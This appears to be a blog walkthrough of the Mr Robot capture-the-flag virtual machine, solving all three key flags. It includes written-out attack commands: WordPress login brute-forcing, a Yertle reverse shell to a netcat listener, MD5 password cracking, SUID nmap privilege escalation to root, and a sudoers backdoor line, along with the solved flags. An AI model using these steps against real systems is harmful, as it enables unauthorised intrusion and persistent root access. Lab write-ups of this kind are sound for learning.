mrrobot

MrRobot - Walkthrough Notes. - Challenge to find 3 Keys notes


Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                       
                                                                                                                                                                                                     
 13 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 676                                                                                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname     
 -----------------------------------------------------------------------------
 192.168.0.18    08:00:27:fa:aa:aa      1      60  PCS Systemtechnik GmbH   



We know the IP is 192.168.0.10

Now a top 1000 ports port scan...


PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https


Open up the Webpage and run Dirb against the site.


**Robots.txt**
fsocity.dic
key-1-of-3.txt


So now we can curl out the first key

--curl http://192.168.0.18/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

Next the output of the dirb shows us a login page for a Wordpress Site...

wp-admin/login.php

Now the first task is to work out the username.

We use the user list we found in the robots.txt file and use the burp repeater against the username field.

Now we view the reponses and find a username that says the password is wrong.
This way it gives away that the user "elliot" exists.

Now we use WPwner with the username of elliot and run it against the wordlist as the passwords with 40 threads..

Ok so lets look at the fsociety file.

If we do a word count we see there are a lot of inputs including a lot of duplicates.

lets remover the duplicates to lower the file size down and direct the output to a new file..


awk '!seen[$0]++' fsocity.dic > unique.txt

Now we run this against the Wpwner and we find the admin password

python wpforce.py -i uset.txt -w ~/123/uniques.txt -u "http://192.168.0.18/" -t 40 -v
Trying elliot : Interesting
--------------------------
[elliot : ER28-0652] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
 100% Percent Complete
All correct pairs:
{'elliot': 'ER28-0652'}



Now we know the username and password we can use Yertle to create a reverse shell.

lets setup a nc listener to catch the yertle shell.

-- nc -l -v -p 80


-- python yertle.py -t http://192.168.0.18 -u elliot -p ER28-0652 -v -li 192.168.0.100 -lp 80 -r


B00m we are in!


####################################Priv Escalation#################################################

Looking in the home directory we find the user account 'robot'
We find two files, the flag file only readable by the user 'robot' and a file that looks to have the password
in encoded in md5 format.


daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

As this is an MD5 its not directly decodeable like base64.
Therefore we can trya n online md5 compare and hope it has been found in the past.
Our luck is in and the password is

abcdefghijklmnopqrstuvwxyz




***NOTE***(if it were base64 we would do)
echo QWxhZGRpbjpvcGVuIHNlc2FtZQ== | base64 --decode

So now we know the password for the user account 'robot'

so lets move into this user..

su robot
password: abcdefghijklmnopqrstuvwxyz

and now we have the user robot's prompt

robot:$

Now we have found the second Key - 822c73956184f694993bede3eb39f959

search for permission owned by root but executed by anyone

find / -user root -perm -4000 -exec ls -ldb {} \;


We find that nmap is installed. We know that early versions of nmap run in interactive mode that runs as root.
This also allows systems commands to be run, and they are therefore executed as root :-)

Now we move into interactive mode that gives us a root shell


!sh

and here we go :-)

Next we can add the user robot to the sudoers file with:

echo "robot ALL=(ALL) ALL" >> /etc/sudoers

now we look ino the /rot an dfind the 3rd key

04787ddef27c3dee1ee161b21670b4e4


Machine r00ted :-)

1 comment:

  1. nice blog ,dialy im following this website but your is unique content as compare to this website > https://47cyber.com

    ReplyDelete